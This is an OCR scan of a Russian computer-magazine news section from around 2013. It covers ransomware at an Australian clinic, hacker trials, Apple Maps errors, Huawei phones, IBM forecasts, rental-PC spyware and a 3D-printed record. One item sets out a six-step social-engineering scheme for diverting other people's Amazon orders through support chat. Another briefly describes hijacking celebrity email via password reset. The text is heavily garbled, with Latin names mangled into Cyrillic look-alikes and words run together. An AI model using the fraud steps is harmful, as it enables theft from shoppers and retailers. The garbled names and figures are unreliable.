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[ИНТЕРНЕТ и СПОРТІ 

К нам ДОВОЛЬНО часто обращаются за различными комментариями 
радио и телевидение. Чаще всего с банальными вопросами о без- 
опасности, и приходится показывать чудеса изобретательности, 
чтобы по-разномурассказыватьободномитомже. Побывают 
и необычные звонки — к примеру, от спортивной радиостанции 
(что само по себе уже неожиданно): «Правда ли, что интернет 
окончательноубилтягукспортуу молодежи?» Секунда раздумий 
и ответ: «На мой взгляд, это полная чушь». 

То, чтоя вижусейчассреди друзей, — как раз осознание, 
что пора уже отлипать от кресла и как можно больше двигаться. 

И современныетехнологиитутне преграда, а скорее помощник. 
Новыесервисы и девайсы позволяютпридатьскучным видам 
активности свежий интерес и колорит. Теперь когда я бегаю, 
то обязательно записываю трек на смартфоне (с помощью про- 
грамм вроде РипКеерег'а): отслеживаю статистику и делюсь ей 
с друзьями в специальной социальной сети. Этоуже нетолько 
не скучно, это увлекательно — так рождается спортивный инте- 
рес. Некоторые из приятелей идут дальше и покупаютгаджеты 
вроде РііЬіІ и Міке+ РиеІВапсі (это такие небольшие браслеты 
на руку), которые отслеживают всю физическую нагрузку за день, 
считая ее в специальных баллах. Получается нешуточное сорев- 
нование: всем хочется показать лучший результат. Тем более сразу 
становится ясно, ктонасамом деле занимается спортом, а у кого 
фитнессводится кперебежкам откомпьютера до машины. Доба- 
вим к этому недорогие сенсоры, отслеживающие пульс, — и пре- 
вращаемтелефон вумного тренера, который построитпрограмму 
тренировок и проследит, чтобы упражнения не были организму во 
вред. Разветакиетехнологии убивают спорт? Ерунда! 

Интернет дал то, чего раньше не было, — огромную базу знаний 
по любым видам спорта. Когда еще можно было посмотреть де- 
тальные маршруты внетрассового катания по Монблану, варианты 
максимально дешево попробовать себя дайвером или карты, с по- 
мощью которых обычную прогулку на лыжах можно превратить 
в приключение кзаброшенным ракетным шахтам? Пресловутые 
социальные сети, которые принято ругать, для многих стали 
мостиком к новым хобби и увлечениям, завязанным на большую 
физическую нагрузку. Поэтомуя совершенно убежден: новые 
технологии только помогаютспорту. И никак не наоборот! 
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Умельцы СМОГЛИ 
произвести с помощью 
30-принтера 
виниловую пластинку. 
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1-ОАУСПЛОИТЫ 



Отсутствие принудительного автоматического обновления в продук- 
тах может сыграть на руку: чтобы написать сплоит, достаточно про- 
анализировать свежие патчи. На следующий деньзаплатки все равно 
не будутустановлены у пользователей — чем не гего бау? 
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МУЗЫКАЛЬНЫЙ СЕРВИС МЕ6АВ0Х 

заработает вскоре после старта 
обновленного МедаІІрІоасІ, сообщил 
Ким Дотком. 



СУРОВЫЙ РОССИЙСКИЙ 
ТРОЯН-ШИФРОВАЛЬЩИК 

ИЗ-ЗА ОБЫЧНОГО В «НАШИХ ПАЛ ЕСТИНАХ» ТРОЯНЦА 
ВСТАЛА РАБОТА БОЛЬНИЦЫ В АВСТРАЛИИ 

ак известно, различные локеры, шифровальщики и прочая 
малварь, чьим главным оружием является вымогательство, 
распространяются потерриториальному признаку и бывают 
ориентированы на жителей самых разных аран. Именно из-за этого 
и с австралийскими ІТ-шниками недавно произошел казус. 

Работу австралийской клиники Міаті Ратііу МебісаІ Сепіге бук- 
вально парализовал троян-шифровальщик, прокравшийся на один 
из центральных серверов учреждения. Вся информация на сервере 
оказалась заблокирована и зашифрована, а «хозяева» трояна (кстати, 
наши соотечественники) потребовали четы ре тысячи долларов за ключ 
для расшифровки. Как ни странно, один из совладельцев клиники Дэвид 
Вуд сообщил прессе, что компания уже склоняется к варианту запла- 
тить злоумышленникам «выкуп». Еще более аранното, что слова Вуда 
поддержали многие австралийские специалисты в сфере ИБ. Очевидно, 
трояны российского производства слишком сложны для австралийцев, 
раз им проще заплатить хакерам. 

Особенно забавно то, что с подобными угрозами российские анти- 
вирусные компании (да и пользователи) сталкиваются ежедневно. Ктому 
же наши антивирусные компании бесплатно помогают восстановить 
расшифрованные данные. Российские эксперты недоумевают, почему 
квалифицированным специалистам из Австралии «проще заплатить» 
в такой ситуации. 



Эксперт в области ИБ 
Найджел Фейр от- 
метил, что на австра- 
лийскиекомпании 
каждую неделю 
совершается отпяти 
до десяти хакерских 
атак.Полициятакже 
сообщила, что слу- 
чайсМіатіРатіІу 
МегіісаІСепІге— это 
десятая атакатакого 
рода за последний 
год. 



МАККИННОНА НЕ ПОСАДЯТ 

ХАКЕР, ВЗЛОМАВШИЙ ПЕНТАГОН И НАСА, 

ВСЕ ЖЕ ИЗБЕЖАЛ СУДА 

сториюобританце Гари Маккиннонеслышали многие, 
благо свои «подвиги» он совершил еще в начале «нуле- 
вых», а судебные разбирательства вокруг них тянулись 
до сих пор. Чем так прославился Маккиннон? В период 2001-2002 
годов хакер взломал в общей сложности 97 компьютеров различных 
ведомств, включая НАСА и Пентагон. Для тех, кто не в курсе этой 
забавной истории: Маккиннон уверяет, что не хотел ничего дурного, 
просто искал доказательства существования инопланетян (увы, 
не нашел) и не пытался извлечь из своих действий какую-либо вы- 
году, втом числе материальную. Разумеется, правоохранительные 
органы СШАне пришли в восторготтакихзаявлений и всеэти годы 
упорно добивались выдачи Маккиннона, обвиняя его в причинении 
материального ущерба в размере 800 тысяч долларов. Помимо 
штрафа, в СШАнеудачливому уфологу грозило до 60 леттюрьмы. 
Маккиннон с 2004 года находился под арестом в родной Великобри- 
тании, и все это время решался вопрос о его экстрадиции. И вот на- 
конец развязка: МВД Великобритании сообщило, что хакер не будет 
выдан США. Маккиннон, у которого было обнаружено расстройство 
психики, могбы покончитьссобой вслучаеэкстрадиции. 









СОЗДАТЕЛЬ ЯЗЫКА РУТНОК 
ГВИДО ВАН РОССУМ ОСТАВИЛ 
РАБОТУ В 60061Е. чтобы 
присоединиться к команде 
ОгорЬох, где он, скорее 
всего, станет старшим раз- 
работчиком. 




ЗА ПРОШЕДШИЙ ГОД РЫНОК 
СОТОВЫХ ТЕЛЕФОНОВ 
ВЫРОС ВСЕГО НА 1,4%. Это 
самый скромный показатель 
за последние три года, не по- 
могла даже популярность 
смартфонов. 




ЗА 170 МИЛЛИОНОВ ЕВРО 
ПРОДАЛИ ШТАБ-КВАРТИРУ 
НОКІАВФИНЛЯНДИИ. 

Но съезжать компания не на- 
мерена:сновым владельцем 
уже заключили долгосроч- 
ныйдоговораренды. 



13% ПОЛЬЗОВАТЕЛЕЙ НА- 
ХОДЯТ ДВУХФАКТОРНУЮ 
АУТЕНТИФИКАЦИЮ (допол- 
нительный код на мобиль- 
ный телефон) «слишком 
сложной», подсчитали 
вБіЬегЗузІетз. 



«ЭЛКОМСОФТ» ВЫПУСТИЛА 
ПРОГРАММУ Р0ЯЕИ5ІС ОІБК 
ОЕСЯѴРТОЯ.Назтотраз 
ломать (с целью кримина- 
листической экспертизы) 
стало можно ВіШоскег, РОР 
иТгиеСгурІ. 
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ВІТСОІМ ИДЕТ В ОФЛАЙН— отныне криптовалюта сотрудничаете французской компанией АцоЬа и банком СгесШ Миіиеі. 



КАКУКРАСТЬ 
ЧУЖУЮ ПОСЫЛКУ 

АМА20Н ОПЯТЬ «НА ВЫСОТЕ» 



МОБИЛЬНЫЕ 
НОВИНКИ НОАѴѴЕІ 

ЧЕТЫРЕ АЫОКОІО-СМАРТФОНАОБНОВЛЕННОЙ ЛИНЕЙКИ 



□ асто делаешь покупки в Сети и заказываешь товары с Атагоп? 
Что ж, вот очередная история о том, что эти ребята имеют очень 
странные представления о безопасности. Саппорт Атагоп. 
сот скоро станет именем нарицательным. В последнее время все чаще 
и чаще именно из-за странностей в работе этой службы клиенты одного 
из крупнейших онлайновых магазинов планеты становятся жертвами 
мошенников. К примеру, совсем недавно взломали журналиста ѴѴігесі 
Мэта Хонана, и косвенная вина легла на Атагоп. Однако некоторых эта 
история ничему не научила, поэтому Атагоп по-прежнему представ- 
ляет собой настоящий пир духа для социальных инженеров. Новый 
способ обмануть ближнего на удивление прост. Атагоп позволяет об- 
щаться с поддержкой в чате, даже не пройдя авторизации на сайте или 
по телефону. Более того, магазин так любит своих клиентов, что готов 
разрешить им через чатсменить адрес сделанного заказа. Признаем, 
возможность переправить заказ на другой адрес и правда может быть 
удобна, если ты неожиданно переехал или отбыл в командировку. 
Однако Атагоп не подумала о безопасности, так что злоумышленники 
уже обнаружили «баг» и перенаправляют чужие заказы на свои адреса. 
Схема мошенничества такова: 

1 . Узнать номер заказа, он имеет вид 1 03-4ХХХХХХ-ХХХХХХХ. Номерами 
заказов Атагоп, со списками товаров, торгуют на подпольных фору- 
мах. То есть можно даже выбрать наиболее понравившийся заказ. 

2. Далее понадобится узнать имя жертвы и ее почтовый адрес, на ко- 
торый был сделан заказ. Как правило, эта информация продается 
вместе с номером заказа, но ее можно узнать и другими путями. 

3. Зарегистрировать адрес для приема почты и посылок на террито- 
рии США (например, на КеБНір.сот . Популярный среди сетевых 
шопоголиков БЫріІо.сот вряд ли подойдет, там нужно пройти слиш- 
ком серьезное подтверждение личности). 

4. Регистрируем е-таіі, похожий на е-таіі жертвы [необязательно, 
ведь в чате можно использовать даже несуществующий адрес). 

5. Заходим в чат Атагоп (или звоним в саппорт по телефону) и просим 
поменять адрес доставки заказа. Вежливый сотрудник поддержки 
попроситуказать номер заказа, который мы узнали на этапе 1, это 
1 03-4ХХХХХХ-ХХХХХХХ. Для убедительности можно также объяснить 
причину смены адреса доставки — командировка, переезд, стихий- 
ное бедствие, а также описать товары, которые входят в заказ. 

6. Атагоп направляет заказ по новому почтовому адресу. Ргобі! 

Политика компании Атагоп гласит — нужно всегда максимально 
идти навстречу клиенту, даже если придется выслать товар повторно. 
Словом, крадут мошенники скорее у компании, нежели у людей. Ведь 
жертва, скорее всего, тоже получит свой экземпляр товара. Так, один 
из пострадавших вообще узнал о мошенничестве случайно: получил 
на свой почтовый ящик бтаіі подтверждение смены адреса доставки. 
Злоумышленник по неопытности использовал в чате почтовый ящик 
сточкой (вида СЬгіз.СагсііпаігадтаіІ.сот). Он похож на оригиналь- 
ный адрес СИгізСагсііпаКадтаіІ.сот, так что бтаіі воспринимает его 
как алиас, дублируя все сообщения на оригинальный адрес. 




а 

Концепцию обнов- 
ленной линейки 
можноописать 
однимсловои— 
Моге: больше 
возможностей, 
больше мощности, 
большестиля 
и выбора для по- 
купателей. 



омпания Ниаѵѵеі представила на российском рынке новые мо- 
дели смартфонов, ориентированные на самыхтребовательных 
пользователей. 

Доступный А$сеп(і 6500 Рго базируется на процессоре АРМ Согіех А9 
1 ГГц и может похвастаться двумя $1М-картами, дисплеем 4,3 дюйма идо- 
вольно солидным аккумулятором на 1 930 мА • ч. Смартфон работает под 
управлением ОС Апбгоісі ѵ4.0 ІС5. Стоимость девайса— 9900 рублей. 

Нопог РРО построен на двухъядерном процессоре с частотой 1 ,2 ГГц, 
и его отличают 1Р5-экран (540 х 960 точек), система объемного звучания 
0Т5 БиггоипсіесІ БоипсІ и 8-мегапиксельная фотокамера. (Дена устрой- 
ства — 11 990 рублей. 

Азсепсі Р1 XI — новая версия популярного Авсепсі Р1 с увеличенным 
аккумулятором. Впечатляющая мощь двухъядерного процессора ТІ 
ОМАР 4460 Сог1ех1-А9 с тактовой частотой 1,5 ГГц, 51ІРЕР АМОІЕО ди- 
сплей с размером изображения 960 х 540 точек и диагональю 4,3 дюйма 
гармонично дополнены аккумулятором высокой емкости (2600 мА • ч). 
Новая версия обойдется в 1 6 990 рублей. 

И наконец, флагман — Азсепгі 01 диагі XI, сочетающий в себе практи- 
чески все самые выигрышные стороны перечисленных моделей. Мощь 
четырехъядерного процессора Ниаѵѵеі КЗѴ2 1,4 ГГц заключена в ком- 
пактном корпусе, толщиной всего 1 1,5 мм. «Лицо» смартфона — НО- 
монитор ІР5 с диагональю 4,5 дюйма и разрешением 128(І х 720. Долгое 
время автономной работы обеспечивает батарея повышенной емкости 
2600 мА • ч. Также в комплекте две камеры: задняя 8-мегапиксельная 
камера РиІІ НО и фронтальная на 1,3 Мп. (Дена флагмана 1 9 990 рублей. 



У РЯЕЕВ50 НЕХВАТКА ПОЖЕРТВОВАНИЙ 



ЗА ГОД РКЕЕВ50 РОЦНОАТІОЫ ПЛАНИРОВАЛА 
СОБРАТЬ 500 ТЫСЯЧ ДОЛЛАРОВ, НО НАБРАЛОСЬ ЛИШЬ 
260 тысяч. ОРГАНИЗАЦИЯ ВЗЫВАЕТ О ПОМОЩИ 
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МЕ0АМЕѴѴ5 



С 201 0 ГОДА ЦЕНА НА 550-НАКОПИТЕЛИ СНИЗИЛАСЬ с отметки в 3 доллара до 0,80-0,90 доллара за гигабайт. 



ПРИГОВОР КРИСТОФЕРУ 
ЧЕЙНИ ВЫНЕСЕН 



АРРСЕ МАР5 ОПАСНЫ 
ДЛЯ ЖИЗНИ 



ВЗЛОМАВШИЙ ГОЛЛИВУДСКИХЗВЕЗД ХАКЕР ПОЛУЧИЛ ДЕСЯТЬ ЛЕТ 




прошлом году Кристофер Чейни наделал много 
шума. Ты наверняка его помнишь, ведь именно 
Чейни мы должны быть благодарны за фотогра- 
фии обнаженной Скарлетт Йохансон (хотя взломщик также 
вскрыл почту Кристины Агилеры, Милы Кунис и еще более 
пятидесяти знаменитостей). Напомним, что «злодей» про- 
мышлял киберслежкой за звездами с 2008 по 201 1 год. Чейни 
делал это не со зла и не наживы ради, но от скуки и любопыт- 
ства. Никаким особенным хакерством он не занимался, лишь 
использовал функцию восстановления забытого пароля, 
а в качестве ответа на секретный вопрос вводил публич- 
но доступную информацию о знаменитостях. После этого 
он устанавливал в настройках почтового аккаунта функцию 
направлять копию письма на свой почтовый адрес. 

Неудивительно, что, когда Чейни начал распространять 
приватные фотографии и переписку знаменитостей, его 
быстро выследили и арестовали. ФБР даже гордо провело 
операцию «ОрегаІіопНаскегаггі». Гордиться тут, правда, 
нечем — безработный 35-летний Чейни жил с бабушкой, 
не был криминальным гением и уж тем более «страшным 
хакером». 

По жестким американским законам Кристоферу Чейни 
грозило до шестидесяти леттюремного заключения, но «ха- 
кер» согласился сотрудничать, и количество обвинений 
сократили. В итоге Чейни приговорили к 1 20 месяцам заклю- 
чения и выплате компенсаций на сумму 76 тысяч долларов. 




ОколоѲООсвежих 
писем приходило 
КристоферуЧейни 
каждое утро.Уже 
послеареста он при- 
знался, что чтение 
этой корреспонден- 
ции было для него 
чем-то вроде окна 
вдругоймир. 



КАРТЫ АРРІЕ И ТАК РУГАЮТ ВСЕ, КОМУ 
НЕ ЛЕНЬ, НО ПОСЛЕ ЭТОГО СЛУЧАЯ... 

е секрет, что приложение Арріе Марз, вошедшее 
в состав І05 6, получилось сырым и недоработан- 
ным. Проблемы были так серьезны, что «полетели 
головы»: уволили руководителя группы разработки при- 
ложения Ричарда Уильямсона и главу разработки і05 Скотта 
Форстолла. Кроме того, генеральный директор Арріе Тим Кук 
вынужден был лично принести извинения за Арріе Марз. 

Случившееся в Австралии показывает, что с Арріе Марз 
все даже хуже, чем можно было подумать. Полиция неболь- 
шого города Милдьюры, что расположен в штате Виктория, 
недавно обратилась к автомобилистам с предупреждением, 
что использование Арріе іРЬопе в составе последней версии 
операционной системы І05 6 может быть опасно. Оказыва- 
ется, местные копы уже устали спасать автомобилистов — 
поклонников «яблочной» техники. Следуя указаниям Арріе 
Марз, ничего не подозревающие люди раз за разом заезжа- 
ли далеко в пустыню, на самом деле пытаясь попасть в этот 
самый городМилдьюра. Деловтом,чтона картах город 
обозначен примерно в 70 км оттого места, где он расположен 
реально. Так что вместо Милдьюры водители оказывались 
в пустыне, где некоторые из них едва не погибли, не имея 
с собой запасов пищи и воды. 

Полицейские уже уведомили об обнаруженной «неточно- 
сти» Арріе, но явно нужно основательно переделывать кар- 
тографическое приложение, а не просто исправлять баги. 






ЭКСПЛОЙТ-КИТ ВІАСКНОІЕ 
ВЕСЬМА ПОПУЛЯРЕН 
КАКВХАКЕРСКИХ 
КРУГАХ , так и на черном 
рынке, однако кто создал 
этот, во многих отношениях 
неприятный набор— допод- 
линно неизвестно. Недавно 
специалист компании ЗорЬоз 
Габор Саппанош в своем 
блоге сообщил, что компании 
удалось получить доступ к ис- 
ходникам ВіаскИоІе, которые 
однозначно свидетельствуют 
о российских корнях малвари. 




«АНТИВИРУСНЫЙ» ИН- 
СТРУМЕНТ АРРУЕКІРІСАТІОН 
5ЕЙѴІСЕ, вароенный в новый 
Апсігоісі, находит лишь 15,32% 
вирусов, проверили в универ- 
ситете Северной Каролины. 




В ТУПИЕК НАКОНЕЦ-ТО 
ПОЯВИЛАСЬ ВОЗМОЖНОСТЬ 

экспортировать все свои со- 
общения. Твиты можно скачать 
единым 21Р-архивом, без вся- 
ких сторонних сервисов. 
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лишь 54% РОССИЯН ЗНАЮТ О РЕЕСТРЕ запрещенных сайтов, показал опрос, проведенный фондом «Общественное мнение». 




□ 

Некоторые из прежних прогнозов ІВМ ужесбылись, к примеруудаленный доступ в медицине и пере- 
вод речи в режиме реального времени. 



ЗАГЛЯНЕМ 
В БУДУЩЕЕ С ІВМ 

ЧТО готовит НАМ БЛИЖАЙШАЯ 
ПЯТИЛЕТКА 

ІВМ есть хорошая ежегодная тради- 
ция — составлять небольшие футуро- 
логические прогнозы, пытаясь опре- 
делить, что готовит нам ближайшее 
будущее. Этот аналитический отчет корпорация 
называет «ІВМ пять на пять» (ІВМ 5 іп 5), то есть 
пять инноваций, которые могут появиться и из- 
менить нашу повседневную жизнь в течение 
пяти ближайших лет. Итак, что «прозревает» 
ІВМ в этом году, публикуя предсказания уже 
в седьмой раз? 

На сей раз корпорация сосредоточилась 
вокруг пяти человеческих чувств: осязания, 
зрения, слуха, вкуса и обоняния. 

Осязание. В ІВМ уверены, что втечение пяти 
лет экраны смартфонов, планшетов и других 
устройств научатся передавать ощущение 
текстуры, и мы сможем «пощупать» простыни 
из египетского хлопка, не вставая с кресла. 

Или сможем потрогать человека, разговаривая 
с ним по 5куре (порноиндустрия ликует :)). Это 
может стать реальностью благодаря, например, 
встроенным в мобильные устройства вибро- 
приводам, создающим вибрационное поле, 
ощутимое тактильно на расстоянии нескольких 
миллиметров от дисплея. 

Зрение. Компьютерное зрение станет еще 
«умнее». Машина будет самостоятельно рас- 
познавать объекты на изображениях без под- 
сказок, анализа категорий, в которых размеще- 
ны файлы, и присвоенных этим файлам тегов. 
Мы научим гаджеты определять распреде- 
ление цвета, текстуры, модели и движение. 

На базе подобных технологий в городах можно 
развернуть системы быстрого реагирования 
на различные ситуации, включая стихийные 
бедствия. 

Слух. Скоро компьютеры научатся слышать 
такое, о чем человеку с его несовершенным 
слухом можно только мечтать. Помочь им в этом 
должны распределенные системы сенсо- 



ров, распознающие акустическое давление, 
вибрацию и звуковые волны. Устройства будут 
не только слушать человеческую речь, но и тща- 
тельно фильтровать окружающие шумы, чтобы 
лучше понять содержание. Станет возможно 
даже конкретнее понять, почему плачет младе- 
нец, — быть может, ему плохо, он голоден, или 
же устал, или чем-то сильно расстроен. Также 
подобные системы способны помочь в пред- 
сказании различных природных катастроф, 
например оползней. 

Вкус. ІВМ рассчитывает, что в будущем по- 
явятся машины, способные работать с кате- 
горией вкуса, и скромно признается, что уже 
ведет работу по их созданию. Машины научатся 
определять точную химическую структуру пищи 



и то, почему люди любят ее. Появятся компью- 
терные повара, которые смогут разрабатывать 
новые рецепты блюд. Ну и конечно, обычным 
потребителям станет проще выбирать продукты 
питания. 

Обоняние. Как известно, уже сегодня суще- 
ствуют датчики, способные «измерить» запах 
любого объекта. ІВМ прогнозирует, что через 
пять лет в устройства будут встраиваться 
сенсоры, которые способны диагностировать 
у пользователя простуду или иную болезнь. Та- 
кие датчики могут анализировать запахи, био- 
маркеры и присутствие определенных молекул 
в дыхании человека. Упростится диагностика 
рака, болезней печени и почек, астмы, диабета 
и эпилепсии на начальных стадиях. 




ХАК-ГРУППАРАКА5Т003АЯВИЛА0СЕБЕ 



ХАКЕРЫ СУМЕЛИ ВЗЛОМАТЬ 
СЕТЬ МЕЖДУНАРОДНОГО 
АГЕНТСТВА ПО АТОМНОЙ 
ЭНЕРГИИ. К СЧАСТЬЮ, 
НИЧЕГО ВАЖНОГО 
НЕ УКРАЛИ. 
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МЕ6АМЕѴѴ5 В ІМТЕІ ПОСТАВИЛИ ЭКСПЕРИМЕНТ с участием 81 человека. Итог: сенсорный ввод привлекает рядовых пользователей, но не продвинутых. 



НОВИНКИ 5АМ50М6 НАСЕ5 



корейским гигант представил 

ЛИНЕЙКУ НОУТБУКОВ И СЕНСОРНЫХ 
МОНИТОРОВ 

аппзипд представил на вы- 
ставке Сопзитег Еіесігопісз 
5Ьоѵѵ портфолио продуктов, 
ориентированных на работу с новой 
\Л/іпсіоѵѵ58. Среди новинок — линейка 
мониторов, новые ноутбуки Зегіез 
7 Сбгопоз и ультрабуки. 

Самая интересная новинка среди 
мониторов — 24-ДЮЙМОВЫЙ сенсор- 
ный экран 5С770. Устройство поддер- 
живает до Юточекодновременного 
касания и наклон до 60 градусов. Та- 
ким образом, работа с пальцеориен- 
тированными приложениями становится доступна пользователям настольных 
систем. Также был представлен 27-дюймовый Экран 5С750, поддерживающий 
поворотна 90 градусов, чтоудобно пользователям мультимониторных конфигу- 
раций. Оба монитора будут выпущены в первом квартале 2013 года. 

Также была представлена линейка ноутбуков Бегіез 7, оснащенных сен- 
сорными экранами. 15-дюймовый СЬгопозоснащен процессором Іпіеі Соге 
І736350М и видеокартой АМО Рабеоп НО8870М. Ультрабук Зегіез 7 ІЛіга интере- 
сен тем, что оснащен дискретной видеокартой АМО НО8570М. Доступны конфи- 
гурации с процессорами Іпіеі Соге і5 и І7. Сенсорный экран в ультрабуке являет- 
ся опцией, в зависимости от его наличия ноутбук будет весить 1,46 кг или 1,67 кг. 
В России новинки могут появиться в продаже уже во втором квартале. 





Основная идея 
нового портфолио 
5ат$ипд — дать 
доступ к сенсорным 
функциям >ѴіпсІоѵѵ$ 

8 компьютерам в лю- 
бом форм-факторе, 
дажедесктопам. 




необычный 

ПРИНТЕР 0ТТ05НІВА 

ХОЧЕШЬ ПЕЧАТАЙ, ХОЧЕШЬ СТИРАЙ 



сем известно, что количество деревьев на планете 
сокращается, а мы продолжаем переводить ценный 
ресурс на изготовление бумаги, на которой затем 
распечатываем тонны бесполезной информации. Об этих 
проблемахуже давно кричат«зеленые», и производители 
зачастую прислушиваются как к ним, так и просто к голосу 
разума. 

Компания ТозЫЬа представила экоМФУ е-5Т1Ю10 3061Р/ 
РОЗО. Сразу оговорюсь— это промышленный агрегат, 
предназначенный для использования в крупных компаниях. 
А на страницы нашего журнала он попал благодаря тому, 
чтоумеетпечататьна одном итом же листе бумаги много- 
кратно, стирая ранее напечатанные на немтекст или гра- 
фику. Да, этотдевайсумеет стирать напечатанное. Секрет 
вспециальномтонере, который можноудалитьсбумаги, 
предварительно нагрев ее. Этим занимается модуль РОЗО, 
работающий втандемесе-БТООЮЗОбІР. Кстати, передтем 
какстеретьотпечатанные на листе данные, можно пере- 
вести их в цифровой вид, что тоже удобно. 

Интересно, что это не концепти не прототип, — приобре- 
сти аппарат в Японии можноуже стекущего месяца, а скоро 
он поступит и в мировую розницу. О стоимости экологичного 
МФУ пока ничего не известно. 





КиТРАСКЕК.ОКС 
подал заявку на регистра- 
цию двухтоварныхзнаков 
(гиігаскег и гиігаскегогд) 
для «защиты отмошенни- 
ков». Правообладатели 
Запада рыдают. 



РІН ЗАПРЕТИТ ПОЛЬЗОВА- 
ТЕЛЯМ ВІАСКВЕКРѴ 10 ис- 
пользовать дурацкие пароли 
«123456», «ЫаскЬеггу», 
«дѵ^егіу», «Ьаітап» и многие 
другие (всего 106 комбина- 
ций). 



НАЛВАРЬВНАШИДНИ 
МОЖНО НАЙТИ ГДЕ УГОДНО. 
Недавно бэкдор, позволя- 
ющийудаленноуправлять 
настройками, обнаружили 
в прошивках принтеров 
ЗатзипдиОеІІ. 



РА5РВЕРРУРІ ОБЗАВЕЛСЯ 
МАГАЗИНОМ ПРИЛОЖЕНИЙ 
РІ 5Т0РЕ. Покатам разме- 
щено лишь 24 приложения, 
ноопубликоватьсвои раз- 
работки сможет любой. 



НАЙДЕН ИНТЕРЕСНЫЙ 
ТРОЯН ОРСиСКЕН — ОН РА- 
БОТАЕТ ЛИШЬ ПОСЛЕ ТОГО, 
как юзер кликнетЛКМ. 
Пойматьхитрыйтроян на вир- 
туальной машине почти 
нереально. 
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ЦЕНЫ НА НОО ПО СОСТОЯНИЮ на конец 2012 года все еще остаются на 47% выше, чем до наводнения в Таиланде. 



ШПИОНОМАНЫ ИЗ США 

ВЗЯТЫЕ В КРЕДИТ КОМПЫ «ПРИСМАТРИВАЛ И» ЗА ПОЛЬЗОВАТЕЛЯМИ 



ВИНИЛОВАЯ ПЛАСТИНКА 
НАЗО-ПРИНТЕРЕ 




В ходе судебного 
разбирательства 
выяснилось, 
что сотрудники 
нагазиновпо- 
рой шпионили 
за пользователя- 
ми просто смеха 
ради. Иногда 
дажепослетого, 
какте выплатили 
последний взнос 
по рассрочке. 



П акназываемоергіѵасу и неприкосновенность частной жизни — это 
острая тема не только для Запада, но и для наших широт. Сегодня 
за пользователем не прочь пошпионить практически все, но скан- 
дал, разгоревшийся в США, скорее напоминает привет из начала «нуле- 
вых», когда еще не стеснялись в методах. 

Стало известно, что ряд розничных сетей в Соединенных Штатах пере- 
страховывались, продавая людям компьютеры в рассрочку или же сдавая 
их в аренду. Простого договора им показалось мало, поэтому на машины 
также устанавливалась программа РС Репіаі Адепі, с помощью которой 
компании якобы могли отслеживать состояние своего имущества. В этих 
торговыхсетяхтехника считается собственностью магазина дотех пор, 
пока не будет сделан последний взнос. В случае просрочки продавец впра- 
ве даже изъять покупку обратно. Согласись, даже это уже звучит неприят- 
но? Но выяснилось, что на деле все обстояло даже хуже. 

Федеральнаяторговая комиссия постановила, что разработчик РС 
Репіаі АдепСатакже компании, которые использовали программу, вино- 
вны в «сборе конфиденциальной информации пользователей обманным 
путем». Виновников заставили выплатить компенсацию. Дело в том, 
что помимо прочего РС РепІаІАдепІ оказался настоящим бэкдором. Прога 
в состоянии дистанционно удалять информацию с жесткого диска, уста- 
навливать другое ПО, активироватьвеб-камеруи делать снимки (!), а также 
запоминатьнажатия клавиш и делатьскриншоты. В софтине вообщеоб- 
наружился «детективный» режим с прорвой крайне интересных настроек. 
Как говорится, если у вас паранойя, это еще не значит, что за вами не следят 
на самом деле. 



ЕЩЕОДНОНЕОБЫЧНОЕПРИМЕНЕНИЕ 
ТРЕХМЕРНОЙ ПЕЧАТИ 

ремя отвремени мы рассказываемтебеотом, чего 
сумели добиться «народные умельцы» разных стран 
мира с помощью 30-принтеров и смекалки. Напри- 
мер, печатьоружейныхдеталейужестала реальностью. 

Но пока одни пытаются распечатать себе огнестрел, другие 
занимаются вещами более созидательными. 

Сотрудница іпБІгисІаЫез.сот Аманда Рассей подробно 
рассказала о том, как ей удалось напечатать на 30-принтере 
грампластинку ( іп5Ігис1аЫе5.сот /:с]/ЗР-Р, -У у Ц-Рссогсіі. 
Поссылкеты найдешькрайнеувлекательный и подробней- 
ший рассказ о ее экспериментах, неудачах, а также о том, 
что из всего этого вышло в итоге (там лежат все исходники 
и даже готовые к печати модели песен Мігѵапа, Оа^І Рипк, 
Ра(ііоЬеасі и других). Ну а мне позволь коротко пересказать 
основное. 

Главная проблема на данный момент — разрешения луч- 
ших 30-принтеров мира едва хватает на то, чтобы добиться 
качества звучания, сравнимого с первыми аудиозаписями 
XIX века. Все дело в недостаточной точности. К счастью, 
у Рассей был доступ к шикарной «игрушке» — принтеру 0Ь]еІ 
СоппехбОО, стоимость которого составляет порядка четверти 
миллиона долларов. Этотмонстрспособен печататьс раз- 
решением 42 микрона по осямХиУ и 16 микрон по оси 2 (600 х 
600 X 1600 ОРІ). Однако даже стаким аппаратом пришлось 
попотеть. 

Модель песни генерируется следующим образом: скрипт 
наРуіНопобрабатываетзвуковойфайл, выдавая текстовую 
последовательностьзначений сэмплов. Эта последователь- 
ность обрабатывается библиотекой Ргосеззіпд. Далее модель, 
созданная в Ргосеззіпд, преобразуется в форматЗТІ, его 
принтеруже понимает. Этопроисходитпри помощи библио- 
теки МосіеІВиіІсІег. Непосредственно перед этим звуктакже 
подвергается компрессии и обработке, в противном случае 
он просто не поместится в скромный динамический и частот- 
ный диапазон 30-пластинки. Покажедлительностьзаписи 
вообще ограничена всего одной минутой — больше попросту 
неумещается в памяти принтера. Качество звука тоже вряд 
ли вскружит кому-то голову: отЗО-принтераудалосьдобиться 
разрешения 5-6 бит и частоты дискретизации порядка 10-11 
кГц. Послушать, на что это похоже, можно, проследовав по ука- 
занной выше ссылке, Рассей выложила примеры. 

Подводя итог, замечу, что 30-принтерам предстоитуве- 
личить разрешение еще раз в десять, прежде чем на выходе 
получится качественный звук :). 




НЕМНОГО СТАТИСТИКИ ОТ РОРН^АТСНЕРБ.СОМ 



ЗА ПЕРИОД с 2006 ГОДА 
ИЗВЕСТНЫЕ ПОРНОСАЙТЫ 
ѴОЦРОКН.СОМ И ХНАМ5ТЕВ.С0М 
НАБРАЛИ УЖЕ 93 МИЛЛИАРДА 
ПРОСМОТРОВ ВИДЕО! 
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МЕ6АМЕѴѴ5 С ЭТОГО ГОДА один из САМЫХ ИЗВЕСТНЫХ и массовых американских журналов — Меѵѵвѵѵеек будет выходить только в электронном виде. 



КОГДА ПРОСТО ПОКУПАТЬ 
НЕИНТЕРЕСНО 

ПРОГРАММИСТСОЗДАЛРАНДОМАЙЗЕРДЛЯ ПОКУПОК НА АМА20М 



Первыми двумя покупка- 
ми скрипта стали книга 
Ноама Хомского «Карте- 
зианская лингвистика» 
(Сагіевіап ЫлдиІзНсв) 
иСОскомпозициями 
шведского музыканта 
АковРогтапп.Все 
остальные приобретения 
бота задокументированы 
здесь: га пОотзЬорр ег. 
ІитЫг.сот . 



ноат 

СНОМ5КѴ 




СагТе$іап ііпкиі$Ьс$ 

